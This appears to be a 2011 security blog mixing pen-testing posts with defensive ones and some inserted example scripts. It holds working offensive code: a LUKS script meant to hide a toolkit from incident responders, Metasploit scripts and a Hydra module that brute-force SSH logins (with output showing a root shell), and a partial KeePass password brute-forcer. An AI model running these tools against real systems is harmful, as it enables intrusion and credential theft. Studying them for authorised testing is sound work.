Thursday, December 22, 2011

Owning a Windows Domain with Metasploit's Incognito and Persistence Modules

Found via @armitagehacker on Twitter.

This video shows a demo that uses Armitage (Metasploit) to compromise a Windows Domain Controller.

The attacker gains access to an unpatched Windows web server by exploiting the classic MS08-067. On the web server, the attacker obtains the cached domain credentials of an administrator and uses them to compromise the domain controller.

The attacker also makes use of the persistence module to keep a foothold on the compromised system.


Monday, December 12, 2011

Auditing logs: tracing e-mail transactions

Every good admin knows that analyzing log files plays a key role not only in security, but also in day-to-day IT operations. Who does not read the logs... (sarcasm)?

One of the situations I have to face really often is investigating e-mail problems such as delays, e-mails not arriving, bounces, non-existent user accounts, etc., or simply whether a user sent an e-mail or not.

If reading the logs created by Postfix or Sendmail is a pain per se, trying to understand what happened in a scenario with multiple intermediate servers is a nightmare. Therefore, doing log management is key to success (in this particular situation or any other that involves large quantities of data).


There is nothing fancy in my setup. I am just using a centralized syslog server to collect all the raw logs created by the e-mail servers. Then we can trace the problem from one single place, which is good, but trying to understand what happened is still a pain. We still cannot see the forest for the trees.


I have come up with a Python script (search_email_transactions.py) that parses Postfix and Sendmail logs. It searches all the e-mail transactions that match the message id, the sender, the recipient and the date.

The output is self-explanatory:

# cat /var/log/all |  ./search_email_transactions.py -l -  -f ^me@foo.com  -i 4EDC80B6.8040107@smtp.foo.com

transaction: E324DA41CA
from:   me@foo.com
msgid:  4EDC80B6.8040107@smtp.foo.com
date:   Dec  5 09:28:42
to:     recipent='you@bar.com' , relay='smtp.bar.com[10.10.10.1]:25', status='sent (250 2.0.0 pB58ShMJ024096 Message accepted for delivery)'
host:   smtp1


In this example, it only outputs one unique transaction but in a scenario with multiple servers we should have a listing of all the transactions and all the servers involved, giving us the full picture.

Since it is time and CPU consuming, I am planning to modify this script to treat all the raw logs and dump all this information to a search engine like elasticsearch, making the troubleshooting faster while still having the raw logs in case I need to go deeper.
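The correlation step the script performs is worth seeing in code. The following is an added example written for this page, not the post's search_email_transactions.py: it groups Postfix records from a centralized syslog by host and queue id, filters them by sender regex, message id, recipient and date, and prints them in the same layout as the output above. The log lines (hosts smtp1/smtp2, addresses, queue ids) are constructed sample data, and the example handles only the Postfix syntax, not Sendmail.

```python
#!/usr/bin/env python3
"""Trace e-mail transactions across several Postfix hosts from one centralized syslog file."""
import re
import sys

# Constructed sample of a centralized syslog: hypothetical hosts, addresses and queue ids.
# One message is relayed smtp1 -> smtp2 and bounced there; a second message and an sshd
# record are present to show that unrelated lines are ignored.
SAMPLE_LOG = """\
Dec  5 09:28:40 smtp1 postfix/smtpd[1201]: E324DA41CA: client=ws01.foo.com[10.0.0.5]
Dec  5 09:28:40 smtp1 postfix/cleanup[1202]: E324DA41CA: message-id=<4EDC80B6.8040107@smtp.foo.com>
Dec  5 09:28:40 smtp1 postfix/qmgr[1199]: E324DA41CA: from=<me@foo.com>, size=1234, nrcpt=1 (queue active)
Dec  5 09:28:42 smtp1 postfix/smtp[1203]: E324DA41CA: to=<you@bar.com>, relay=smtp2.foo.com[10.10.10.1]:25, delay=2, delays=0.1/0/0.5/1.4, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 7B1C2F00A1)
Dec  5 09:28:42 smtp1 postfix/qmgr[1199]: E324DA41CA: removed
Dec  5 09:28:42 smtp2 postfix/smtpd[3301]: 7B1C2F00A1: client=smtp1.foo.com[10.0.0.10]
Dec  5 09:28:42 smtp2 postfix/cleanup[3302]: 7B1C2F00A1: message-id=<4EDC80B6.8040107@smtp.foo.com>
Dec  5 09:28:42 smtp2 postfix/qmgr[3299]: 7B1C2F00A1: from=<me@foo.com>, size=1400, nrcpt=1 (queue active)
Dec  5 09:28:45 smtp2 postfix/smtp[3303]: 7B1C2F00A1: to=<you@bar.com>, relay=smtp.bar.com[192.0.2.25]:25, delay=3, delays=0.2/0/1/1.8, dsn=5.1.1, status=bounced (host smtp.bar.com[192.0.2.25] said: 550 5.1.1 User unknown)
Dec  5 09:28:45 smtp2 postfix/qmgr[3299]: 7B1C2F00A1: removed
Dec  5 09:30:01 smtp1 postfix/qmgr[1199]: A1B2C3D4E5: from=<other@foo.com>, size=500, nrcpt=1 (queue active)
Dec  5 09:30:02 smtp1 sshd[777]: Accepted publickey for admin from 10.0.0.9 port 4242 ssh2
"""

SYSLOG_RE = re.compile(
    r"^(?P<date>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"postfix/\S+\[\d+\]: (?P<qid>[0-9A-Z]{6,}): (?P<rest>.*)$"
)
FROM_RE = re.compile(r"from=<(?P<addr>[^>]*)>")
MSGID_RE = re.compile(r"message-id=<(?P<msgid>[^>]*)>")
TO_RE = re.compile(r"to=<(?P<addr>[^>]*)>, relay=(?P<relay>[^,]+),.*status=(?P<status>.*)$")


def parse_transactions(lines):
    """Group Postfix records by (host, queue id): each group is one transaction on one host."""
    txns = {}
    for line in lines:
        m = SYSLOG_RE.match(line.rstrip("\n"))
        if not m:
            continue                      # other daemons share the file; skip them
        key = (m.group("host"), m.group("qid"))
        txn = txns.setdefault(key, {
            "host": m.group("host"), "transaction": m.group("qid"),
            "date": m.group("date"), "from": None, "msgid": None, "to": [],
        })
        rest = m.group("rest")
        f = FROM_RE.search(rest)
        if f:
            txn["from"] = f.group("addr")
        i = MSGID_RE.search(rest)
        if i:
            txn["msgid"] = i.group("msgid")
        t = TO_RE.search(rest)
        if t:
            txn["to"].append({"recipient": t.group("addr"), "relay": t.group("relay"),
                              "status": t.group("status")})
    return list(txns.values())           # insertion order == first appearance in the log


def search_transactions(lines, sender=None, msgid=None, recipient=None, date=None):
    """Filter transactions: sender/recipient are regexes, msgid is exact, date is a prefix."""
    hits = []
    for txn in parse_transactions(lines):
        if sender and not (txn["from"] and re.search(sender, txn["from"])):
            continue
        if msgid and txn["msgid"] != msgid:
            continue
        if recipient and not any(re.search(recipient, t["recipient"]) for t in txn["to"]):
            continue
        if date and not txn["date"].startswith(date):
            continue
        hits.append(txn)
    return hits


def format_transaction(txn):
    """Render one transaction in the same layout as the post's script output."""
    out = ["transaction: %s" % txn["transaction"], "from:   %s" % txn["from"],
           "msgid:  %s" % txn["msgid"], "date:   %s" % txn["date"]]
    for t in txn["to"]:
        out.append("to:     recipient='%s' , relay='%s', status='%s'"
                   % (t["recipient"], t["relay"], t["status"]))
    out.append("host:   %s" % txn["host"])
    return "\n".join(out)


if __name__ == "__main__":
    # Usage: cat /var/log/all | ./trace_mail.py '^me@foo\.com' '4EDC80B6.8040107@smtp.foo.com'
    # With no piped input the constructed sample is searched instead.
    sender = sys.argv[1] if len(sys.argv) > 1 else None
    msgid = sys.argv[2] if len(sys.argv) > 2 else None
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_LOG.splitlines()
    for txn in search_transactions(source, sender=sender, msgid=msgid):
        print(format_transaction(txn))
        print()
```

Running it against the sample with the sender and message id from the post's example lists two transactions, one per host, and the second one carries the bounce status, which is exactly the "full picture" the multi-server case needs.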

Tuesday, November 22, 2011

Understanding APT and Counter Espionage

Thanks to Irongeek I have found the following talk at SkyDogCon.

This is a really good talk you have to watch if you want to understand APT beyond any FUD and if you want to learn how to defend your network against it.



Friday, November 11, 2011

Hiding The Toolkit On Linux With LUKS

The idea behind this post is making Incident Response a little bit more complicated during a pen-test, by hiding our tools in "hidden volumes".


Ideally, when the hard drive has unpartitioned space, the attacker can create a new partition and encrypt it with LUKS to hide the tools. By doing so, the main file system remains unchanged (no new files are written or modified that could trigger an alert in the HIDS) and the volume is difficult to spot unless the defenders keep track of the logs that will point to new file systems being mounted.


The procedure would be pretty easy:
  • Mount the LUKS volume
  • Execute the tool in the background
  • Unmount the LUKS volume in 'lazy mode'

Reading umount(8), we find the -l flag:
Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore. (Requires kernel 2.4.11 or later.)
The following script works under the same principle, but it creates a file instead of a partition. In this case, it creates a 300MB file named "volume" that will contain an ext3 file system encrypted with AES-256.


#!/bin/bash
# Creates a LUKS-encrypted ext3 file system inside a regular file and opens it
# through a loop device. Needs root. Runs under bash: it uses 'function' and '&>'.

function find_device_name {
        # Print the loop device currently backing the given file, e.g. /dev/loop0
        losetup -j "$1" | awk '{print $1}' | cut -f1 -d ":"
}


function create_raw_vol {
        # $1 = file name, $2 = size in MB
        dd if=/dev/zero of="$1" bs=1M count="$2" &> /dev/null
}


function create_luks_volfile {
        # $1 = file name, $2 = size in MB, $3 = passphrase
        local raw_vol_dev=""
        raw_vol_dev=$(losetup -f)
        create_raw_vol "$1" "$2"
        losetup "$raw_vol_dev" "$1"
        echo "$3" | cryptsetup -c aes -s 256 luksFormat "$(find_device_name "$1")" &> /dev/null
        losetup -d "$(find_device_name "$1")"
}


function mount_luks_volfile {
        # $1 = file name, $2 = device-mapper name, $3 = passphrase
        local raw_vol_dev=""
        raw_vol_dev=$(losetup -f)
        losetup "$raw_vol_dev" "$1"
        echo "$3" | cryptsetup luksOpen "$(find_device_name "$1")" "$2" &> /dev/null
}

function umount_luks_volfile {
        # $1 = file name, $2 = device-mapper name
        cryptsetup luksClose "$2" &> /dev/null
        losetup -d "$(find_device_name "$1")"
}

vol_name="./volume"
vol_size="300"
mapper_name="hidden_volume"
password="1234"


create_luks_volfile "$vol_name" "$vol_size" "$password"
mount_luks_volfile "$vol_name" "$mapper_name" "$password"
mkfs.ext3 "/dev/mapper/${mapper_name}"
sleep 5
umount_luks_volfile "$vol_name" "$mapper_name"
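From the defender's side, the caveat in the post is the useful part: the volume is only invisible to someone who looks at files, not to someone who looks at mounts and device-mapper. After a lazy unmount the mount point disappears from /proc/mounts, but the dm-crypt mapping stays open for as long as the backgrounded tool holds the file system, so a check has to look at both. The following is an added example written for this page, not part of the post: it parses /proc/mounts content, reads the device-mapper name/uuid attributes that Linux exposes under /sys/block/dm-N/dm/ (LUKS mappings carry a uuid starting with CRYPT-LUKS), and reports loop-backed mounts, mount points outside a baseline, and crypt mappings with or without a mount. The mount table, the dm attributes and the baseline set are constructed sample data.

```python
#!/usr/bin/env python3
"""Flag loop-backed and dm-crypt file systems that are not part of a known mount baseline."""
import os

# Constructed sample of /proc/mounts as it might look after the post's script has run,
# plus the device-mapper attributes normally read from /sys/block/dm-N/dm/{name,uuid}.
# Hypothetical values, not captured from a real host.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/mapper/vg0-home /home ext4 rw,relatime 0 0
/dev/mapper/hidden_volume /mnt/.x ext3 rw,relatime 0 0
/dev/loop3 /mnt/iso iso9660 ro,relatime 0 0
"""
SAMPLE_DM = {
    "dm-0": {"name": "vg0-home", "uuid": "LVM-CONSTRUCTEDVGUUID-CONSTRUCTEDLVUUID"},
    "dm-1": {"name": "hidden_volume",
             "uuid": "CRYPT-LUKS1-00000000000000000000000000000000-hidden_volume"},
}
BASELINE = {"/", "/proc", "/home"}          # mount points the administrator expects


def parse_mounts(text):
    """Parse /proc/mounts content into (source, mount point, fs type) tuples."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3:
            rows.append((parts[0], parts[1], parts[2]))
    return rows


def read_dm_devices(sys_block="/sys/block"):
    """On a live host, collect {dm-N: {name, uuid}} from sysfs; empty dict if unavailable."""
    devs = {}
    if not os.path.isdir(sys_block):
        return devs
    for entry in os.listdir(sys_block):
        if not entry.startswith("dm-"):
            continue
        try:
            with open(os.path.join(sys_block, entry, "dm", "name")) as f:
                name = f.read().strip()
            with open(os.path.join(sys_block, entry, "dm", "uuid")) as f:
                uuid = f.read().strip()
        except OSError:
            continue
        devs[entry] = {"name": name, "uuid": uuid}
    return devs


def find_suspicious(mounts_text, dm_devices, baseline):
    """Return (kind, detail) findings: loop mounts, unknown mount points, dm-crypt mappings.

    A dm-crypt mapping with no mount is the trace a lazy unmount leaves behind: the mount
    point is gone from /proc/mounts while the mapping stays open as long as the tool runs.
    """
    findings, mapped_names = [], set()
    for source, mountpoint, fstype in parse_mounts(mounts_text):
        if source.startswith("/dev/mapper/"):
            mapped_names.add(source[len("/dev/mapper/"):])
        if source.startswith("/dev/loop"):
            findings.append(("loop-mount", "%s on %s (%s)" % (source, mountpoint, fstype)))
        if mountpoint not in baseline:
            findings.append(("unknown-mountpoint", "%s on %s (%s)" % (source, mountpoint, fstype)))
    for dev, attrs in sorted(dm_devices.items()):
        if attrs["uuid"].startswith("CRYPT-"):
            state = "mounted" if attrs["name"] in mapped_names else "no mount (lazy unmount?)"
            findings.append(("dm-crypt", "%s %s: %s" % (dev, attrs["name"], state)))
    return findings


if __name__ == "__main__":
    try:
        with open("/proc/mounts") as f:
            mounts, dm = f.read(), read_dm_devices()
    except OSError:
        mounts, dm = SAMPLE_MOUNTS, SAMPLE_DM     # fall back to the constructed sample
    for kind, detail in find_suspicious(mounts, dm, BASELINE):
        print("[%s] %s" % (kind, detail))
```

Run periodically (or from the HIDS) with a baseline taken from a clean boot, the "no mount" state of a crypt mapping is the signal worth alerting on, since a legitimately closed volume has neither a mount nor a mapping.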

Fetching the SAM and System Files Without Shutting Down Windows

Via securitybydefault [Spanish]


The linked blog post explains how to fetch the SAM and System files from a Windows computer without shutting down the system.


Since both files are locked by other processes, they cannot be read. Therefore, the standard procedure would be to shut down Windows and run a live distribution to obtain a copy.


The article points to a talk given by Tim Tomes and Mark Baggett at Hack3rcon II, where they introduce a script they wrote to extract the files by creating Shadow Copies.


Monday, October 31, 2011

Extracting the Password Hashes from a Memory Dump

Via this post in thehackernews.com.


This video explains how to use Volatility to extract the NTLM password hashes from a memory dump, by finding the memory addresses that belong to \Windows\system32\config\SAM and \Windows\system32\config\system.




Resources on Vulnerable Web Applications

This post is just a reference to a list of available vulnerable web applications, in case I need to test tools or sharpen my skills :)


This post from Taddong has a good list of projects that maintain vulnerable web applications in several languages: PHP, Java, Ruby, ColdFusion, etc.


The listing is broken into Offline (source code),  VM/ISO  and Live Systems.



Tuesday, October 25, 2011

DroidSheep: Hijacking Sites With Your Android Phone

Found via securitytube .


DroidSheep is an Android application that lets you use your rooted Android phone to easily hijack web sessions on a wireless network.



Tuesday, October 11, 2011

Friday, October 7, 2011

Chris Gates and Rob Fuller at Derbycon 2011

Really nice presentation that Chris Gates and Rob Fuller gave at Derbycon 2011 (via IronGeek).

In a nutshell, the talk shows how a pen-test should be carried out instead of the simple 'scan-exploit-report'.

A proper penetration test must be data driven and it will always be customer dependent. In fact, one of the most complicated parts of a penetration test is deciding with the customer the objective and the rules of engagement.

The last part explains several post-exploitation techniques and some available tools that are under development.


Wednesday, October 5, 2011

Adaptive Penetration Testing at Derbycon

Irongeek has started publishing the videos of Derbycon 2011 and the following one is probably one of my favorites so far.

Kevin Mitnick and Dave Kennedy go through some examples of penetration tests that mainly use social engineering attacks.

At the end of the talk Dave Kennedy also presented the new version of The Social-Engineer Toolkit.

Really worth watching!

Friday, September 30, 2011

Windows Shellbags and Post Exploitation

Via securityaegis and seen in Twitter.


Shellbags are a set of registry keys that store the preferences of each folder that has been opened at least once with Windows Explorer (local, remote, portable devices, etc.).

From a post-exploitation point of view, this information gives us a good idea of the activities being carried out on the exploited desktop computer. Thus, we can figure out how critical the computer and the information it holds are for our customer.

The linked post comments that, during a big engagement, we may pop a shell on a computer that belongs to HR, R&D, etc., but, at first sight, we could not tell how important it is compared to several other similar desktops in the organization.

Below you can find a demo of the meterpreter script in action.




Untitled from Securityaegis on Vimeo.

Thursday, September 22, 2011

Embedding Msfconsole in Python scripts through the XMLRPC interface

During the last days I have been playing with Metasploit's XMLRPC interface and I have had lots of fun! :)

I have created a set of Python classes that let you interact with Metasploit in different ways, hiding the complexity of the XMLRPC calls.


MsfBatch
This class launches non-interactive jobs in Metasploit, which will be run in the background.


MsfConsole
This class embeds a full Metasploit console in your Python script. It also offers a bit of automation, because it can launch some tasks in the background or foreground before we start interacting with the console.




Examples
The following code launches an auxiliary module to find which SSH version a particular server is running. This script launches the task and then starts interacting with the created console.

#!/usr/bin/env python

import signal
import sys
from pymsf import pymsf


def signal_controlc(signum, frame):
        # Control+C: tear down the console on the server side before exiting
        myconsole.destroy()
        sys.exit(0)


if len(sys.argv) != 2:
        print("usage: %s <rhost>" % sys.argv[0])
        sys.exit(1)

myconsole = pymsf.MsfConsole()
myconsole.login("msf", "123456")     # msfrpcd user and password
myconsole.create_console()


opts = {
        "RHOSTS": sys.argv[1],
}
print("launching")
signal.signal(signal.SIGINT, signal_controlc)
# launch the scanner before handing the console over to the user
myconsole.aux("auxiliary/scanner/ssh/ssh_version", opts, True)
myconsole.interact()
myconsole.destroy()

Output
# ./version.py 127.0.0.1
launching

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


       =[ metasploit v3.7.2-release [core:3.7 api:1.0]
+ -- --=[ 699 exploits - 361 auxiliary - 54 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r12982 updated 94 days ago (2011.06.20)

Warning: This copy of the Metasploit Framework was last updated 94 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

RHOSTS => 127.0.0.1
[*] 127.0.0.1:22, SSH server version: SSH-2.0-OpenSSH_5.4p1 FreeBSD-20100308
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(ssh_version) >



The following code launches batch jobs in our running Metasploit console, trying to log in to an SSH server. The script keeps waiting until the job has finished and then lists the existing sessions in case we have created a new one.

#!/usr/bin/env python

import sys
from pymsf import pymsf


if len(sys.argv) != 3:
        print("usage: %s <rhost> <password>" % sys.argv[0])
        sys.exit(1)

batch = pymsf.MsfBatch()
batch.login("msf", "123456")         # msfrpcd user and password

opts = {
        "RHOSTS": sys.argv[1],
        "RPORT": "22",
        "USERNAME": "root",
        "PASSWORD": sys.argv[2],
        "THREADS": "8",
        "USER_AS_PASS": "false",
        "BLANK_PASSWORDS": "false"
}

# count the sessions before the job so that a new one can be detected afterwards
batch.aux("scanner/ssh/ssh_login", opts)
before = batch.numSessions()
batch.waitJobsFinished()
if before < batch.numSessions():
        print("New session created. Listing opened sessions")
        batch.listSessions()

print("Finish")

Output
./login.py 127.0.0.1 toor
New session created. Listing opened sessions
auxiliary/scanner/ssh/ssh_login  :: 127.0.0.1
Finish


The code can be found here
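For anyone who wants to see what pymsf is hiding, the following is an added example written for this page, not pymsf itself: a thin wrapper over xmlrpc.client that performs the console flow (auth.login, console.create, console.write, polling console.read until the console reports busy = false, console.destroy) and the job polling that MsfBatch.waitJobsFinished does (job.list until empty). Those method names and response shapes are the ones of the Metasploit RPC API of that era as I know it, and are to be checked against the version in use; the msfrpcd URL, the credentials (the same "msf"/"123456" the post uses) and the scripted FakeMsfServer responses are assumptions so that the flow can run offline.

```python
#!/usr/bin/env python3
"""The XMLRPC calls behind a Metasploit console session (what a wrapper like pymsf hides)."""
import sys
import time
import xmlrpc.client


class MsfRpc:
    """Every RPC method takes the auth token as its first argument; wrap that once."""

    def __init__(self, proxy):
        self.proxy = proxy       # xmlrpc.client.ServerProxy, or a test double of the same shape
        self.token = None

    def _method(self, name):
        return getattr(self.proxy, name)    # ServerProxy accepts dotted names like "console.read"

    def login(self, user, password):
        res = self._method("auth.login")(user, password)
        if res.get("result") != "success":
            raise RuntimeError("authentication failed")
        self.token = res["token"]

    def call(self, name, *args):
        if self.token is None:
            raise RuntimeError("login first")
        return self._method(name)(self.token, *args)

    def run_console_command(self, command, timeout=60, poll=0.5):
        """console.create, write the command, read until busy is false, destroy the console."""
        cid = self.call("console.create")["id"]
        try:
            self.call("console.read", cid)                      # drain the banner
            self.call("console.write", cid, command + "\n")
            output, deadline = "", time.time() + timeout
            while True:
                time.sleep(poll)                                 # let the command start
                chunk = self.call("console.read", cid)
                output += chunk.get("data", "")
                if not chunk.get("busy", False):
                    return output, chunk.get("prompt", "")
                if time.time() > deadline:
                    raise TimeoutError("console still busy after %ss" % timeout)
        finally:
            self.call("console.destroy", cid)

    def wait_jobs_finished(self, timeout=300, poll=1.0):
        """Poll job.list until no background job remains; False on timeout."""
        deadline = time.time() + timeout
        while self.call("job.list"):
            if time.time() > deadline:
                return False
            time.sleep(poll)
        return True


class FakeMsfServer:
    """Scripted stand-in for msfrpcd so the flow runs offline (assumed response shapes)."""

    def __init__(self):
        self.reads = 0
        self.jobs = {"0": "Auxiliary: scanner/ssh/ssh_version"}
        self.destroyed = []

    def __getattr__(self, name):
        handlers = {
            "auth.login": lambda u, p: ({"result": "success", "token": "TEMPTOKEN"}
                                        if (u, p) == ("msf", "123456") else {"result": "failure"}),
            "console.create": lambda t: {"id": "0", "prompt": "msf > ", "busy": False},
            "console.read": self._read,
            "console.write": lambda t, cid, data: {"wrote": len(data)},
            "console.destroy": lambda t, cid: self.destroyed.append(cid) or {"result": "success"},
            "job.list": lambda t: dict(self.jobs),
        }
        if name not in handlers:
            raise AttributeError(name)
        return handlers[name]

    def _read(self, token, cid):
        self.reads += 1
        if self.reads == 1:
            return {"data": "banner\n", "prompt": "msf > ", "busy": False}
        if self.reads == 2:
            return {"data": "RHOSTS => 127.0.0.1\n", "prompt": "", "busy": True}
        self.jobs.clear()       # the background job has completed by now
        return {"data": "[*] Auxiliary module execution completed\n", "prompt": "msf > ", "busy": False}


def demo(proxy=None):
    """Run one console command and wait for background jobs; returns the console output."""
    rpc = MsfRpc(proxy or FakeMsfServer())
    rpc.login("msf", "123456")
    output, prompt = rpc.run_console_command("run", poll=0 if proxy is None else 0.5)
    rpc.wait_jobs_finished(timeout=30, poll=0 if proxy is None else 1.0)
    return output + prompt


if __name__ == "__main__":
    # Assumed endpoint for a real msfrpcd (e.g. http://127.0.0.1:55553/RPC2); no arg runs the fake.
    proxy = xmlrpc.client.ServerProxy(sys.argv[1]) if len(sys.argv) > 1 else None
    print(demo(proxy))
```

The two details that matter when writing such a wrapper are visible here: the token has to be threaded through every call, and a console command is asynchronous, so the only reliable completion signal is the busy flag returned by console.read, not the presence of a prompt in the output.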

Monday, September 19, 2011

Tracking the Attackers with a Web Honeypot

GlastopfNG is a web honeypot that simulates vulnerable web applications in order to attract intruders and understand their attacks.

The following talk is mainly focused on the researcher's point of view, getting statistics and finding new attacks, but I understand that this tool is extremely useful for defenders because it may help us to spot and study the attackers as well.

Its key features are:

  • Dynamically generated dorks to attract attackers.
  • A pattern matching engine.
  • Extensible with modules to detect and react to new attacks.
  • Custom reporting: we can write our own report module that feeds our alerting system.


Slides


Thursday, September 15, 2011

Analyzing Malicious PDF Files with Peepdf [Spanish]

Via securitybydefault


peepdf is a tool written in Python that analyzes the tree structure of a PDF file. This kind of tool is really helpful to get a first impression and decide whether a PDF file could be malicious or not.

The linked post uses peepdf to find the objects containing the JavaScript code that performs the heap spray and the shellcode.

Once the shellcode is extracted, they use a standard debugger to conclude that it downloads a version of the Zeus trojan.

Friday, September 9, 2011

Team Tactics In Armitage

Via Securitytube.

I have found this great video that explains how to use Armitage in a team scenario. Great tool!

You can find a complete training in a series of 6 videos posted by Raphael Mudge in his profile on Securitytube.





Armitage and Metasploit Training - Team Tactics from Raphael Mudge on Vimeo.

Tuesday, September 6, 2011

Some Post Exploitation Goodness

Via room362.com (Rob Fuller)

Rob Fuller has created three documents in Google Docs with a list of commands that can be used to gather information during the post exploitation phase in Windows, Linux and OSX systems.

I am sure the lists are  going to be really useful for many people with the help of some Metasploit Scripting skills.

Unix Post Exploitation

Windows Post Exploitation

OSX Post Exploitation

Monday, August 29, 2011

Clean a wordlist for use with password cracking tools and rules

Via commandlinefu.com


This post is just a personal note. I am sure I will need this command in the future to clean up my wordlists :)


$ cat dirtyfile.txt | awk '{gsub(/[[:punct:]]/,"")}1' | tr A-Z a-z | sed 's/[0-9]*//g' | sed -e 's/ //g' | strings | tr -cs '[:alpha:]' '\ ' | sed -e 's/ /\n/g' | tr A-Z a-z | sort -u > cleanfile.txt

Monday, August 22, 2011

Password cracking and creating custom wordlists

In this day and age almost everybody has a good video card, like an Nvidia card with the CUDA framework, that can be used to crack passwords, and it really helps to speed things up.


Yes, I agree that computing power is really helpful, but it cannot beat a well-crafted custom wordlist. Cracking MD5 hashes may be fast, but try doing the same with other hashes :)


My advice is simple. Know your target as well as you can! Their culture, their language, their people, what they do for a living, etc., and build a custom dictionary on top of that.


You may also find this old post published by the Pauldotcom crew useful. The idea behind it is using the target's website for our dictionary since, in theory, it is a valuable source of the vocabulary used inside the company.



I did some tests following the tips above and I used Cryptohaze Multiforcer (a CUDA-based multihash cracker) to crack the passwords. The results were spectacular: I ended up with a 400MB wordlist (approx. 35M words) and it found many of the passwords in a few minutes :)









Thursday, August 18, 2011

Attacking PEAP wireless networks

Great video, as always, posted by Vivek Ramachandran on SecurityTube.


This time, Vivek explains how to attack PEAP networks. In short, a honeypot is set up with a rogue AP and a RADIUS server in order to capture the challenge and response (802.1X) sent when an unaware user connects to our system.

Once we have captured the challenge and the response sent to our own RADIUS server, we can use the tool called asleap, written by Joshua Wright, which will brute-force the password with a dictionary attack.




WLAN Security Megaprimer 33 from Vivek Ramachandran on Vimeo.

Wednesday, August 10, 2011

Trolling the Tor Script Kiddies

Following a tweet by insit0r about script kiddies abusing Tor to attack web sites, and about blocking them, I thought we should go a bit further and be evil with them.


My first comment was not to block all the Tor exit nodes, since the attacker will use alternative solutions and we will lose visibility. In my opinion, it is better to flag the connection as breaking our policies than just to block it, because the second case will not give us information about the intention and skills of the attackers, only a rejected connection.


So, it is better to receive a warning that flags a possible illegal activity and correlate and track the attacker's movements across our infrastructure.


The above comments amount to passive monitoring and information gathering, but we could put on our grey hat and do something a little bit evil to our attackers :)

What about sending some countermeasures to our attacker, taking advantage of our position, given that the attacker is not aware he/she has been discovered?

Following this talk in Spanish presented by Roberto Martinez, I thought we could use ModSecurity to inject content into the pages when we detect someone is connecting through Tor. This gives us the following possibilities:


Note: Searching on Google I found this directory that lists all the Tor exit nodes. Now we have all the tools to troll the script kiddies that want to attack our website.


Friday, August 5, 2011

Brute-forcing SSH accounts with THC Hydra and Metasploit

I have written a simple auxiliary module for Metasploit that brute-forces SSH accounts with THC Hydra and loads the sessions into Metasploit.

The approach is as simple as executing Hydra from the shell and recovering the valid credentials with a regular expression. After this, we only have to open a new session with the SSH libraries available in the framework.

As a side note, this module cannot be used through pivoting, like any external program, but the code can be modified to call hydra with a wrapper like tsocks and then scan through the Socks4a server module.

...
%x[tsocks hydra -f -o #{logfile} -w #{timeout} -t #{threads} -s #{rport} -C #{credentials} #{ip}  ssh2]
...


NOTE: Some of the code is borrowed from the existing SSH auxiliary modules.

Example output:

msf auxiliary(ssh_hydra) > info

       Name: Scanning SSH servers with Hydra
     Module: auxiliary/scanner/ssh/ssh_hydra
    Version: 1
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  ghosthunter

Basic options:
  Name         Current Setting   Required  Description
  ----         ---------------   --------  -----------
  CREDENTIALS  /tmp/credentials  yes       colon separated list of credentials
  RHOSTS       X.X.X.X     yes       The target address range or CIDR identifier
  RPORT        22                yes       The target port
  TASKS        8                 yes       number of connexions in parallel
  TIMEOUT      30                yes       timeout for the responses

Description:
  This module will launch THC hydra to brute-force the ssh credentials
  and then open the sessions with the valid ones.


msf auxiliary(ssh_hydra) > run

[*] X.X.X.X:22, SSH server version: SSH-1.99-OpenSSH_4.4
[*] Attacking X.X.X.X
[*] X.X.X.X:22  /tmp/credentials - Calling Hydra

[*] Valid credentials found: X.X.X.X root root
[*] Command shell session 1 opened (Y.Y.Y.Y:35009 -> X.X.X.X:22) at Fri Aug 05 19:06:00 +0200 2011
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The module can be found here: ssh_hydra.rb

Thursday, August 4, 2011

[Spanish] Offensive Security talk by Roberto Martinez

The following video corresponds to a talk presented by Roberto Martinez at the Campus Party in Mexico.


I highly recommend watching this video since it explains how security should be done in real life, instead of installing devices and ticking a checkbox :)

I would summarize the talk as:

  • Information gathering
  • Intelligence
  • Honeypots
  • Feed all your information into a SIEM system to monitor the network activity.
  • Deception and counter attacks: resource exhaustion, dropping exploits
  • Deanonymization and tracking attackers: decloaking and using our DNS to track the attacker.

In my opinion, I would also add darknets or sinkholes to gain extra intelligence :)



[Spanish] Attacking 2G mobile communications

Via rootedcon. They have published more videos of the last Rooted CON 2011.

The following video explains how to perform attacks on 2G mobile networks by making use of OpenBSC.




David Pérez y José Picó - Un ataque práctico contra comunicaciones móviles (Rooted CON 2011) from rootedcon on Vimeo.

Wednesday, August 3, 2011

Brute-forcing Keepass password key-chains

From the website:

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

This open source password manager is available on Windows, Mac, Linux, Android and iPhone. Hence, chances are that we will find one of these keychain files during a pen-test.


Looking for ways to brute-force the password I stumbled across this Python implementation that is able to read the file and dump its contents. It should not be too inefficient, since it uses pycrypto, which is implemented in C.


The code is fairly simple and expects the list of passwords on standard input. One possibility is to use John the Ripper for this task :)

You can find the code below.



#!/usr/bin/env python

# https://github.com/brettviren/python-keepass

# Reads a list of candidate passwords from standard input, one per line, and
# tries each one against the KeePass database given as the first argument.
# John the Ripper (or any wordlist) may be used to feed the script.

import sys
from keepass import kpdb

if len(sys.argv) != 2:
        print("usage: %s <database.kdb> < wordlist" % sys.argv[0])
        sys.exit(2)

